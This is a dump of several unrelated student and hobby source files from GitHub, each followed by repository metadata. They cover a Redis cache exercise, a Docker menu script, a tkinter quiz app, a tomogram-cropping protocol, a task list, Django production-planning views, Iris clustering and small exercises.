print('{}(*{}) -> {}'.format(methodName.__qualname__,
input.decode('utf-8'),
output.decode('utf-8')))
class Cache():
"""
Main class for cache
"""
def __init__(self):
""" CONSTRUCTOR"""
self._redis = redis.Redis()
self._redis.flushdb()
@call_history
@count_calls
def store(self, data: Union[str, bytes, int, float]) -> str:
"""
Takes a data as argumen a store in a REDIS db
Remember that data can be a str, bytes, int or float.
Returns: A key in string format
"""
_randomkey = uuid4().__str__()
self._redis.set(_randomkey, data)
return _randomkey
def get(self, key: str,
fn: Optional[Callable] = None) -> Union[str, bytes, int, float]:
""" Get the values as specific func"""
data = self._redis.get(key)
if fn:
return fn(data)
return data
    def get_int(self, data: int) -> int:
        """ Get the value as int """
        try:
            return int(data)
        except Exception:
            return 0
def get_str(self, data: str) -> str:
""" Get the values as str"""
return self._redis.get(data).decode('utf_8')
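# Usage sketch (assumes a Redis server is reachable with the default
# redis.Redis() settings):
if __name__ == '__main__':
    cache = Cache()
    key = cache.store("hello")
    print(cache.get(key, fn=lambda d: d.decode('utf-8')))
    replay(cache.store)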
|
lemejiamo/holbertonschool-backend-storage
|
0x02-redis_basic/exercise.py
|
exercise.py
|
py
| 3,014 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41011803429
|
from os import system
def img():
    # pull an image; called both from menu option 1 and before running a
    # container (option 2), so it must not depend on the menu choice x
    y=input("enter the name of img")
    z=input("u want version y/n if n it will take latest").lower()
    if z=='y':
        a=input("enter the version eg 0.2")
        system(f"docker pull {y}:{a}")
    else:
        system(f"docker pull {y}")
def seeimg():
system(f"docker image ls")
def seecon():
print("all the containers")
system("docker ps -a")
print("all the running container")
system("docker ps")
def attach():
name=input("enter the name of docker")
system(f"docker restart {name}")
z=input("u want to attach to docker y/n")
if z=='y':
system(f"docker attach {name}")
def rmimg():
seeimg()
name=input()
system(f"docker image rm -f {name}")
def rmcon():
seecon()
name=input()
system(f"docker container rm -f {name}")
("\t\t\tWelcome to docker automation")
system("systemctl start docker")
while True:
print("""\t\t\tpress 1 to pull img
\t\t\tpress 2 to run docker
\t\t\tpress 3 to make your own img
\t\t\tpress 4 to make your own network
\t\t\tpress 5 to make your own permanent storage
\t\t\tpress 6 to see img
\t\t\tpress 7 to see container
\t\t\tpress 8 to remove container
\t\t\tpress 9 to remove img
\t\t\tpress 10 to exit
\t\t\tpress 11 to attach
\t\t\tpress 12 to remove network
\t\t\tpress 13 to remove storage""")
x=int(input())
if x==1:
img()
elif x==2:
k=""
print("the img u have")
p=system("docker image ls")
print(p)
z=input("enter image name:version")
p="null"
p=system(f"docker image ls|grep {z}")
if p!=z:
img()
i=input("u want to run on back y/n ").lower()
if i=='y':
k=k+" -d "
i=input("u want to add name y/n ").lower()
if i=='y':
name=input("enter the new name")
k=k+" --name "+name
i=input("u want to add network y/n").lower()
if i=='y':
name=input("enter the name of network")
k=k+" --network "+name
i=input("u want to add volume y/n").lower()
if i=='y':
name=input("enter the name of volume or directory")
name1=input("enter the directory where u want to copy")
k=k+" --v "+name+":"+" "+name1
k=k+" "+z
system(f"docker run -it{k}")
elif x==3:
name=input("enter name or id of the container")
name1=input("name of the img")
system(f"docker commit {name} {name1}")
elif x==4:
name=input("enter a new network name")
name1=input("name of driver host null bridge")
if name1=="host" or name1=="null":
print("plz remove first there must be one ")
else:
system(f"docker network create --driver {name1} name")
elif x==5:
name=input("enter a new voltage name")
system(f"docker volume create {name}")
elif x==6:
seeimg()
elif x==7:
seecon()
elif x==8:
rmcon()
elif x==9:
rmimg()
elif x==10:
        break
elif x==11:
attach()
elif x==12:
name=input("enter the network name")
system(f"docker network rm -f {name}")
elif x==13:
name=input("enter the volume name")
system(f"docker volume rm -f {name}")
|
chirag248/Docker
|
doc.py
|
doc.py
|
py
| 3,536 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41184065609
|
THEME_COLOR = "#375362"
FONT=("Arial",15,"italic")
from tkinter import *
from quiz_brain import QuizBrain
class Quizinterface:
def __init__(self,quizbrain:QuizBrain):
self.window= Tk()
self.score=0
self.quiz=quizbrain
#label Score
self.set()
self.label=Label(text=f"Score: {self.score}",bg=THEME_COLOR,fg="white",pady=20)
self.label.grid(row=0,column=1)
# Refresh
# self.refresh_image=PhotoImage(file="images/rename.png")
self.refresh=Button(highlightthickness=0,text="Refresh",command=self.refresh_operations)
self.refresh.grid(row=0,column=0)
#Canvas
self.canvas = Canvas(width="300", height="250", highlightthickness=0,bg="white")
self.question_text=self.canvas.create_text(150,125,text="Some text",fill=THEME_COLOR,
font=FONT,width=200)
self.canvas.grid(row=1, column=0, columnspan=2,pady=50)
#Button tick and cross
self.tick_image = PhotoImage(file="images/true.png")
self.correct = Button(image=self.tick_image, highlightthickness=0,command=self.trueAnswered)
self.correct.grid(column=0, row=2,pady=50)
        self.cross_image = PhotoImage(file="images/false.png")  # keep a reference so Tk does not garbage-collect the image
        self.wrong = Button(image=self.cross_image, highlightthickness=0,command=self.falseAnswered)
self.wrong.grid(row=2, column=1,pady=50)
self.get_next()
self.window.mainloop()
def set(self):
self.window.title("Quiz App")
self.window.config(bg=THEME_COLOR,padx=20, pady=20)
def get_next(self):
if self.quiz.still_has_questions():
self.canvas.config(bg="white")
self.qtext=self.quiz.next_question()
self.canvas.itemconfig(self.question_text,text=self.qtext)
def falseAnswered(self):
        is_right = self.quiz.check_answer("False")
print(is_right)
self.feedback(is_right)
#self.get_next()
def trueAnswered(self):
is_right=self.quiz.check_answer("True")
print(is_right)
self.feedback(is_right)
# def check(self,is_right):
# if is_right==True:
# self.score+=1
# print(self.score)
#
# self.feedback()
# else:
# self.feedback(False)
def feedback(self,is_right):
if is_right:
self.canvas.config(bg="green")
self.label.config(text=f"Score: {self.quiz.score}")
else:
self.canvas.config(bg="red")
self.window.after(1000,self.get_next)
def refresh_operations(self):
self.quiz.ref()
self.label.config(text=f"Score:{self.quiz.score}")
|
sshanbhag09/PythonBootcamp-
|
PycharmProjects/Day34FurtherChanged/ui.py
|
ui.py
|
py
| 2,730 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17534123607
|
class Programmer:
"""
"""
def __init__(self, name: str, language: str, skills: int):
self.name = name
self.language = language
self.skills = skills
def watch_course(self, course_name, language, skills_earned) -> str:
"""
check if player knows the language, so they can
watch the course
:param course_name:
:param language:
:param skills_earned:
:return:
"""
if language == self.language:
self.skills += skills_earned
return f'{self.name} watched {course_name}'
return f'{self.name} does not know {language}'
def change_language(self, new_language, skills_needed):
if new_language == self.language:
return f'{self.name} already knows {new_language}'
if skills_needed > self.skills:
return f'{self.name} needs {skills_needed - self.skills} more skills'
old_language, self.language = self.language, new_language
self.skills = 0
return f'{self.name} switched from {old_language} to {new_language}'
programmer = Programmer("John", "Java", 50)
print(programmer.watch_course("Python Masterclass", "Python", 84))
print(programmer.change_language("Java", 30))
print(programmer.change_language("Python", 100))
print(programmer.watch_course("Java: zero to hero", "Java", 50))
print(programmer.change_language("Python", 100))
print(programmer.watch_course("Python Masterclass", "Python", 84))
|
emilynaydenova/SoftUni-Python-Web-Development
|
Python-OOP-Oct2023/Exercises/01.First Steps in OOP/07.Programmer.py
|
07.Programmer.py
|
py
| 1,498 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44592268706
|
# **************************************************************************
# *
# * Authors: J.L. Vilas ([email protected]) [1]
# *
# * [1] Centro Nacional de Biotecnologia, CSIC, Spain
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2 of the License, or
# * (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
# * 02111-1307 USA
# *
# * All comments concerning this program package may be sent to the
# * e-mail address '[email protected]'
# *
# *********************************************************************
from pyworkflow import BETA
from pyworkflow.protocol.params import PointerParam
from tomo.objects import Tomogram
import os
from pyworkflow.object import Set
from xmipptomo.protocols.protocol_crop_resize_base import XmippProtCropBase3D
SUFIXCROPPED = '_cropped.mrc'
class XmippProtCropTomograms(XmippProtCropBase3D):
"""
Protocol to crop tomograms using xmipp_transform_window.
The protocol allows to change the size of a tomogram/s, by removing the
borders defined by the users
"""
_label = 'crop tomograms'
_devStatus = BETA
# --------------------------- DEFINE param functions ------------------------
def _defineParams(self, form):
form.addSection(label='Input')
form.addParam('inputSet',
PointerParam,
pointerClass='SetOfTomograms',
important=True,
label='Input set of tomograms',
help='Select a set of tomograms to be cropped.')
self._defineParamsReSize2D(form)
self._defineParamsReSize3D(form)
# --------------------------- INSERT steps functions ------------------------
def _insertAllSteps(self):
for tomo in self.inputSet.get():
self._insertFunctionStep(self.cropTomogramsStep, self.inputSet.get(), tomo.getObjId())
self._insertFunctionStep('closeStreamStep')
# --------------------------- STEP functions --------------------------------
def cropTomogramsStep(self, tomoSet, tomId):
'''
        This function resizes the tomograms by means of xmipp_transform_window.
        The output is created in pseudo-streaming: pseudo because the input is
        not open, but the output is updated during the execution of the protocol.
'''
ts = self.inputSet.get()[tomId]
tsId = ts.getTsId()
outputPath = self._getExtraPath(str(tsId))
# Defining the output folder
os.mkdir(outputPath)
inputTomo = tomoSet[tomId].getFileName()
outputTomo = self.outputTomoFileName(outputPath, tsId, SUFIXCROPPED)
# Launching the xmipp command
params = ' -i %s ' % inputTomo
params += ' -o %s ' % outputTomo
params += ' --corners %i %i %i %i %i %i ' %(self.xcrop0.get(), self.ycrop0.get(),
self.zcrop0.get(), self.xcropF.get(),
self.ycropF.get(), self.zcropF.get())
params += ' --physical'
self.runJob("xmipp_transform_window", params)
# Creating the output in pseudostreaming
outputresizedSetOfTomograms = self.getOutputSetOfTomograms()
newTomogram = Tomogram()
tomo = self.inputSet.get()[tomId]
newTomogram.copyInfo(tomo)
newTomogram.copyAttributes(tomo, '_origin')
newTomogram.setLocation(outputTomo)
newTomogram.setSamplingRate(self.inputSet.get().getSamplingRate())
outputresizedSetOfTomograms.append(newTomogram)
outputresizedSetOfTomograms.update(newTomogram)
outputresizedSetOfTomograms.write()
self._store()
def outputTomoFileName(self, folder, tomId, ext):
fnPath = os.path.join(folder, str(tomId) + ext)
return fnPath
def closeStreamStep(self):
self.getOutputSetOfTomograms().setStreamState(Set.STREAM_CLOSED)
self._store()
def getOutputSetOfTomograms(self):
'''
This function defines the output of the protocol
'''
if hasattr(self, "outputSetOfTomograms"):
self.outputSetOfTomograms.enableAppend()
else:
outputSetOfTomograms = self._createSetOfTomograms(suffix='cropped')
outputSetOfTomograms.copyInfo(self.inputSet.get())
outputSetOfTomograms.setSamplingRate(self.inputSet.get().getSamplingRate())
outputSetOfTomograms.setStreamState(Set.STREAM_OPEN)
self._defineOutputs(outputSetOfTomograms=outputSetOfTomograms)
self._defineSourceRelation(self.inputSet, outputSetOfTomograms)
return self.outputSetOfTomograms
# --------------------------- INFO functions ----------------------------
def _summary(self):
summary = []
if hasattr(self, 'outputSetOfTomograms'):
summary.append("%d tomograms have been resized using the xmipp_transform_window program\n"
% self.outputSetOfTomograms.getSize())
else:
summary.append("Output not ready yet.")
return summary
def _methods(self):
methods = []
if hasattr(self, 'outputSetOfTomograms'):
methods.append("%d tomograms have been resized using the xmipp_transform_window program\n"
% self.outputSetOfTomograms.getSize())
else:
methods.append("Output tomograms not ready yet.")
return methods
|
I2PC/scipion-em-xmipptomo
|
xmipptomo/protocols/protocol_crop_tomograms.py
|
protocol_crop_tomograms.py
|
py
| 6,045 |
python
|
en
|
code
| 4 |
github-code
|
6
|
6020834834
|
import os
import cv2
import shutil
source_path = 'test_copy_image'
des_path = 'train_image_label'
def get_all_label_file_to_image_file():
list_file = os.listdir(source_path)
list_label = [file for file in list_file if file.endswith('.txt')]
return list_label
def copy_image_according_to_label():
label_name = get_all_label_file_to_image_file()
print('There are {} label files'.format(len(label_name)))
print(label_name)
# copy files
for name in label_name:
# copy text file
orig_label = os.path.join(source_path, name)
des_label = os.path.join(des_path, name)
print(des_label)
shutil.copy(orig_label, des_label)
# copy image file
img_name = name.split('.')[0] + '.jpg'
orig_img = os.path.join(source_path, img_name)
#print(origin)
des_img = os.path.join(des_path, img_name)
#print(des)
img = cv2.imread(orig_img)
cv2.imwrite(des_img, img)
copy_image_according_to_label()
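# Note on the design: cv2.imread/imwrite re-encodes the JPEG on copy; if a
# byte-for-byte copy is enough, shutil.copy(orig_img, des_img) (already used
# for the label file) would preserve the original image exactly.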
|
hluong89/calc_bounding_box_YOLO
|
copy_image_according_to_labels.py
|
copy_image_according_to_labels.py
|
py
| 1,014 |
python
|
en
|
code
| 1 |
github-code
|
6
|
34776536653
|
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.urls import reverse
from ..filters.CRPFilter import CRPFilter
from ..forms.CRPForm import UpdateCRPForm, CRPTrackForm, AddCRPForm
from django.forms import modelformset_factory
from datetime import datetime, timedelta
from ..forms.ProductCenterForm import CapacitySchedulingFormCRP
from ..models.CRP import CRPTrack, CRP
from ..models.Finished import Finished
from ..models.OperationList import OperationList
from ..models.ProductCenter import ProductCenter, CapacityScheduling
from ..models.OperationSequence import OperationSequence
from django.contrib import messages
list_crp_props = {
"title": "CRP",
}
post_crp_props = {
"title": "Add CRP",
}
views_crp_props = {
"title": "View CRP",
}
update_crp_props = {
"title": "Update CRP",
'btn_name': 'Update'
}
copy_crp_props = {
"title": "Copy CRP",
'btn_name': 'Copy'
}
def ListCRP(request):
if request.method == "GET":
crp_track = CRPTrack.objects.all()
list_crp_props['crp_track'] = crp_track
list_crp_props['filters'] = CRPFilter()
return render(request, 'PP/planning/crp/list.html', context=list_crp_props)
def FilterCRP(request):
if request.method == 'POST':
filter = CRPFilter(request.POST, queryset=CRPTrack.objects.all())
if filter.is_valid():
if len(filter.qs.values()) != 0:
return JsonResponse({
'CRPTrack': list(filter.qs.values()),
'mass': 'success',
}, status=200)
else:
return JsonResponse({
'mass': 'error',
}, status=200)
else:
return JsonResponse({
'mass': 'error',
})
else:
return JsonResponse({
'mass': 'error',
})
def PostCRP(request):
if request.method == "POST":
finish = request.POST.get('finished_no')
order_ref = request.POST.get('order_ref')
order_qty = request.POST.get('order_qty')
if request.is_ajax():
finish = Finished.objects.get(id=finish)
opl = OperationList.objects.filter(id=finish.operations_list.id).values()
opsec = OperationSequence.objects.filter(operation_list=finish.operations_list).values()
crp = []
for ops in opsec:
pc = ProductCenter.objects.get(id=ops['production_center_id'])
cs = CapacityScheduling.objects.filter(ProductCenterId=ops['production_center_id']).last()
crp.append({
'operationSequence': ops['operationSequence'],
'productioncneter': pc.product_center_name,
'AvalStartDate': cs.Date,
'reqdcapunit': ops['reqdcapunit'],
'ReqdMcHrByUnit': ops['totaltime'],
'AvalStartTime': cs.EndTime,
'AvalMcHrOrDay': cs.BalMcOrHour,
'NoOfMCByResAval': int(pc.NoOfMByC) - int(cs.NoOfMCAlloctd),
'AvalCAPByDay': cs.BalanceCap,
})
crp_track_form = CRPTrackForm({'finished': finish,
'operationlist': finish.operations_list.id,
'product_description': finish.product_description,
'order_ref': order_ref,
'order_qty': order_qty
})
if crp_track_form.is_valid():
crp_track_form = crp_track_form.save()
return JsonResponse({
'mass': "success",
'operation_scheduling': list(opsec),
'crps': crp,
'CRPTrack': list(CRPTrack.objects.filter(id=crp_track_form.id).values())
}, status=200)
operationSequence = request.POST.getlist('operationSequence')
productioncneter = request.POST.getlist('productioncneter')
AvalStartDate = request.POST.getlist('AvalStartDate')
StartDate = request.POST.getlist('StartDate')
NoOfMCByResAval = request.POST.getlist('NoOfMCByResAval')
AvalCAPByDay = request.POST.getlist('AvalCAPByDay')
reqdcapunit = request.POST.getlist('reqdcapunit')
ReqdCAPByDay = request.POST.getlist('ReqdCAPByDay')
AvalMcHrOrDay = request.POST.getlist('AvalMcHrOrDay')
ReqdMcHrByUnit = request.POST.getlist('ReqdMcHrByUnit')
ReqdMcHour = request.POST.getlist('ReqdMcHour')
AvalStartTime = request.POST.getlist('AvalStartTime')
StartTime = request.POST.getlist('StartTime')
EndTime = request.POST.getlist('EndTime')
EndDate = request.POST.getlist('EndDate')
NoOfMcByRes = request.POST.getlist('NoOfMcByRes')
mc_id_no = request.POST.getlist('mc_id_no')
crp_track = request.POST.getlist('crp_track')
mass = False
if len(operationSequence) != 0:
for x in range(0, len(operationSequence)):
crp = AddCRPForm({
'crp_track': CRPTrack.objects.get(id=crp_track[x]),
'operationSequence': operationSequence[x],
"productioncneter": productioncneter[x],
"reqdcapunit": reqdcapunit[x],
"ReqdMcHrByUnit": ReqdMcHrByUnit[x],
"AvalStartDate": AvalStartDate[x],
'AvalStartTime': AvalStartTime[x],
"NoOfMCByResAval": NoOfMCByResAval[x],
"AvalCAPByDay": AvalCAPByDay[x],
'AvalMcHrOrDay': AvalMcHrOrDay[x],
'StartDate': StartDate[x],
'ReqdCAPByDay': ReqdCAPByDay[x],
'ReqdMcHour': ReqdMcHour[x],
'StartTime': StartTime[x],
'EndTime': EndTime[x],
'EndDate': EndDate[x],
'NoOfMcByRes': NoOfMcByRes[x],
'mc_id_no': mc_id_no[x]
})
if crp.is_valid():
crp = crp.save()
crp_tracks = CRPTrack.objects.get(id=crp.crp_track)
BalanceCap = int(crp.AvalCAPByDay) - int(crp.ReqdCAPByDay)
cs = CapacitySchedulingFormCRP({
'ProductCenterId': ProductCenter.objects.get(product_center_name=crp.productioncneter),
'Date': crp.AvalStartDate,
'AvalCapOrDay': crp.AvalCAPByDay,
'CapALlloctdTo': crp_tracks.finished.id,
'AlloctdCap': crp.ReqdCAPByDay,
'BalanceCap': BalanceCap,
'AvalMcOrResHour': crp.AvalMcHrOrDay,
'ReqdMcOrResHour': crp.ReqdMcHour,
'BalMcOrHour': str(float(crp.AvalMcHrOrDay) - float(crp.ReqdMcHour)),
'StartTime': crp.StartTime,
'EndTime': crp.EndTime,
'NoOfMCAlloctd': crp.NoOfMcByRes,
})
if cs.is_valid():
cs.save()
if BalanceCap == 0:
AvalStartDates = datetime.strptime(str(crp.AvalStartDate), '%Y-%m-%d')
AvalStartDates = AvalStartDates + timedelta(days=1)
pc = ProductCenter.objects.get(product_center_name=crp.productioncneter)
csl = CapacityScheduling.objects.filter(ProductCenterId=pc.id).first()
cs = CapacitySchedulingFormCRP({
'ProductCenterId': ProductCenter.objects.get(product_center_name=crp.productioncneter),
'Date': AvalStartDates,
'AvalCapOrDay': csl.AvalCapOrDay,
'CapALlloctdTo': csl.CapALlloctdTo,
'AlloctdCap': csl.AlloctdCap,
'BalanceCap': csl.BalanceCap,
'AvalMcOrResHour': csl.AvalMcOrResHour,
'ReqdMcOrResHour': csl.ReqdMcOrResHour,
'BalMcOrHour': csl.BalMcOrHour,
'StartTime': csl.StartTime,
'EndTime': csl.EndTime,
'NoOfMCAlloctd': csl.NoOfMCAlloctd,
})
if cs.is_valid():
cs.save()
mass = True
else:
mass = False
if mass:
messages.success(request, 'CRP Created Successfully.')
return HttpResponseRedirect(reverse('productionplanning:CRP', args={crp_track[0]}))
else:
messages.error(request, 'CRP Not Created Successfully.')
return render(request, 'PP/Planning/crp/general_data_form.html', context=post_crp_props)
else:
return render(request, 'PP/Planning/crp/general_data_form.html', context=post_crp_props)
def AddCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
post_crp_props['crp_track'] = crp_track
post_crp_props['crp'] = crp
return render(request, 'PP/Planning/crp/add_crp.html', context=post_crp_props)
def ViewCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
views_crp_props['crp_track'] = crp_track
views_crp_props['crp'] = crp
return render(request, 'PP/Planning/crp/views.html', context=views_crp_props)
def UpdateCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
update_crp_props['crp_track'] = crp_track
update_crp_props['crp'] = crp
CRPFoemSet = modelformset_factory(CRP, form=UpdateCRPForm, extra=0)
formset = CRPFoemSet(queryset=crp)
update_crp_props['formset'] = formset
if request.POST:
formset = CRPFoemSet(request.POST, queryset=crp)
if formset.has_changed():
if formset.is_valid():
formset.save()
messages.success(request, 'CRP Update Successfully.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
messages.error(request, 'CRP Form is not valid.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
messages.error(request, 'Value is not Change.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
return render(request, 'PP/Planning/crp/update_crp.html', context=update_crp_props)
def CopyCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
copy_crp_props['crp_track'] = crp_track
copy_crp_props['crp'] = crp
CRPFoemSet = modelformset_factory(CRP, form=UpdateCRPForm, extra=0)
formset = CRPFoemSet(queryset=crp)
copy_crp_props['formset'] = formset
if request.POST:
mass = []
crp_trackForm = CRPTrackForm(data={
'finished': crp_track.finished,
'operationlist': crp_track.operationlist,
'product_description': crp_track.product_description,
'order_ref': crp_track.order_ref,
'order_qty': crp_track.order_qty,
})
if crp_trackForm.is_valid():
crp_trackForm = crp_trackForm.save()
for x in crp:
dirs = {
'crp_track': CRPTrack.objects.get(id=crp_trackForm.id),
'operationSequence': x.operationSequence,
'productioncneter': x.productioncneter,
'AvalStartDate': x.AvalStartDate,
'StartDate': x.StartDate,
'reqdcapunit': x.reqdcapunit,
'ReqdMcHrByUnit': x.ReqdMcHrByUnit,
'AvalStartTime': x.AvalStartTime,
'AvalMcHrOrDay': x.AvalMcHrOrDay,
'NoOfMCByResAval': x.NoOfMCByResAval,
'AvalCAPByDay': x.AvalCAPByDay,
'ReqdCAPByDay': x.ReqdCAPByDay,
'ReqdMcHour': x.ReqdMcHour,
'StartTime': x.StartTime,
'EndTime': x.EndTime,
'EndDate': x.EndDate,
'NoOfMcByRes': x.NoOfMcByRes,
'mc_id_no': x.mc_id_no,
}
crp_form = UpdateCRPForm(data=dirs)
print(2,crp_form.is_valid())
if crp_form.is_valid():
crp_form = crp_form.save(commit=False)
crp_form.crp_track = CRPTrack.objects.get(id=crp_trackForm.id)
crp_form.save()
mass.append(True)
else:
mass.append(False)
if len(mass) == mass.count(True):
messages.success(request, '{} to {} Copy Successfully.'.format(id, crp_trackForm.id))
return redirect('/productionplanning/crp/')
else:
messages.error(request, 'Copy Not Successfully.')
return redirect('/productionplanning/crp/')
else:
messages.error(request, "CRP Form isn't Valid.")
return redirect('/productionplanning/crp/')
else:
return render(request, 'PP/Planning/crp/update_crp.html', context=copy_crp_props)
def DeleteCRP(request, id):
crp = CRPTrack.objects.get(id=id)
crp.delete()
messages.error(request, '{} Delete Successfully.'.format(id))
return redirect('/productionplanning/crp/')
|
nazmul53p/ERP
|
productionplanning/views/CRPViews.py
|
CRPViews.py
|
py
| 14,011 |
python
|
en
|
code
| 1 |
github-code
|
6
|
12578258527
|
class Task:
def __init__(self, id, description):
self.id = id
self.description = description
class TaskList:
def __init__(self, file_name):
self.file_name = file_name
self.tasks = []
self.load_tasks()
def load_tasks(self):
try:
with open(self.file_name, 'r') as f:
for line in f:
                    id, description = line.strip().split('|')
                    # store ids as ints so comparisons in update/delete work
                    self.tasks.append(Task(int(id), description))
except FileNotFoundError:
pass
def save_tasks(self):
with open(self.file_name, 'w') as f:
for task in self.tasks:
f.write(f"{task.id}|{task.description}\n")
def create_task(self, description):
        # use max existing id + 1 so ids stay unique even after deletions
        id = max((task.id for task in self.tasks), default=0) + 1
task = Task(id, description)
self.tasks.append(task)
self.save_tasks()
return task
def read_tasks(self):
return self.tasks
def update_task(self, id, description):
for task in self.tasks:
if task.id == id:
task.description = description
self.save_tasks()
return task
def delete_task(self, id):
for i, task in enumerate(self.tasks):
if task.id == id:
del self.tasks[i]
self.save_tasks()
return
# Exemplo de uso:
task_list = TaskList('tasks.txt')
while True:
# Imprime o menu de opções
print('\nEscolha uma opção:')
print('1. Ver tarefas')
print('2. Adicionar tarefa')
print('3. Atualizar tarefa')
print('4. Remover tarefa')
print('0. Sair')
# Lê a opção escolhida pelo usuário
option = input('> ')
if option == '1':
# Ler todas as tarefas
tasks = task_list.read_tasks()
for task in tasks:
print(task.id, task.description)
elif option == '2':
# Criar uma nova tarefa
description = input('Digite a descrição da tarefa: ')
task = task_list.create_task(description)
print(f'Tarefa {task.id} adicionada com sucesso!')
elif option == '3':
# Atualizar uma tarefa existente
id = input('Digite o ID da tarefa que deseja atualizar: ')
description = input('Digite a nova descrição da tarefa: ')
task = task_list.update_task(int(id), description)
if task:
print(f'Tarefa {task.id} atualizada com sucesso!')
else:
print('Tarefa não encontrada')
elif option == '4':
# Remover uma tarefa existente
id = input('Digite o ID da tarefa que deseja remover: ')
task_list.delete_task(int(id))
print(f'Tarefa {id} removida com sucesso!')
elif option == '0':
# Sai do programa
break
else:
print('Opção inválida, tente novamente')
|
EltonLunardi/Projetos_pequenos
|
CRUDSimples/crud.py
|
crud.py
|
py
| 2,863 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
41364868505
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 31 11:56:58 2019
@author: saransh
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans,AgglomerativeClustering,DBSCAN
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn import metrics
from scipy.optimize import linear_sum_assignment
def purity_score(y_true, y_pred):
contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)
row_ind, col_ind = linear_sum_assignment(-contingency_matrix)
return contingency_matrix[row_ind, col_ind].sum() / np.sum(contingency_matrix)
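# Purity here matches each predicted cluster to a true class with the Hungarian
# algorithm (linear_sum_assignment on the negated contingency matrix) and
# returns the fraction of samples landing in their matched class.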
csv = pd.read_csv("Iris.csv")
datay = csv["Species"]
data = csv.drop(columns = ["Species"],axis = 1)
#pca = PCA(n_components=2).fit(data)
data = PCA(n_components=2).fit_transform(data)
data=pd.DataFrame(data)
print("_________________")
print(" ")
print("2D-Points After Reducing Dimensions ")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],color="blue")
plt.show()
Kmean = KMeans(n_clusters=3)
labels = Kmean.fit_predict(data)
#labels = Kmean.predict(data)
print("_________________")
print(" ")
print("KMeans Clustering")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],c=Kmean.labels_,cmap='viridis')
centers=Kmean.cluster_centers_
plt.scatter(centers[:,0],centers[:,1],s=100,c='black')
plt.show()
print("purity score for KMeans Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels)))
print("_________________")
print(" ")
print(" ")
print(" ")
print("_________________")
print(" ")
print("Agglomerative Clustering")
print("_________________")
cluster = AgglomerativeClustering(n_clusters=3, affinity='euclidean', linkage='average')
labelag=cluster.fit_predict(data)
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=cluster.labels_, cmap='rainbow')
plt.show()
'''
Kmean.fit(data)
labels = Kmean.predict(data)
print("_________________")
print(" ")
print("KMeans Clustering")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],c=labels,cmap='viridis')
centers=Kmean.cluster_centers_
plt.scatter(centers[:,0],centers[:,1],s=100,c='black')
plt.show()
print("purity score for KMeans Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels)))
print("_________________")
plt.show()
'''
print("purity score for Agglomerative Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labelag)))
print("_________________")
print(" ")
print(" ")
print("_________________")
print(" ")
print("DBSCAN")
print("_________________")
epsp=[0.05,0.5,0.95]
min_samplesp=[1,5,10,20]
ps=[]
arr = []
for i in epsp:
for j in min_samplesp:
db = DBSCAN(eps = i, min_samples = j)
arr.append([i,j])
labels1 = db.fit_predict(data)
ps.append([purity_score(pd.DataFrame(datay),pd.DataFrame(labels1)),i,j])
psmax=max(ps)
ind = ps.index(psmax)
print('for eps = 0.05 and minpts = 1')
db = DBSCAN(eps = 0.05, min_samples = 1).fit(data)
labels1 = db.labels_
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=db.labels_)
plt.show()
db = DBSCAN(eps = arr[ind][0], min_samples = arr[ind][1]).fit(data)
labels1 = db.labels_
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=db.labels_, cmap='rainbow')
plt.show()
print("purity score for DBSAN is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels1)))
print("_________________")
|
Saransh0905/Data-Science-3
|
agglomerativeClustering and DBSCAN/lab11.py
|
lab11.py
|
py
| 3,419 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31533884286
|
actor_name = input()
points_from_academy = float(input())
number_of_evaluators = int(input())
total_points = points_from_academy
total_evaluator_points = 0
difference = 0
is_nominated = False
for evaluator in range(number_of_evaluators):
evaluator_name = input()
evaluator_points = float(input())
total_evaluator_points = len(evaluator_name) * evaluator_points / 2
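    # e.g. an evaluator named "Anna" (4 letters) awarding 30 points contributes 4 * 30 / 2 = 60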
total_points += total_evaluator_points
if total_points > 1250.5:
is_nominated = True
break
if is_nominated:
print(f"Congratulations, {actor_name} got a nominee for leading role with {total_points:.1f}!")
if not is_nominated:
difference = abs(total_points - 1250.5)
print(f"Sorry, {actor_name} you need {difference:.1f} more!")
|
iliyan-pigeon/Soft-uni-Courses
|
programming_basics_python/for_loops/oscars.py
|
oscars.py
|
py
| 741 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5432983759
|
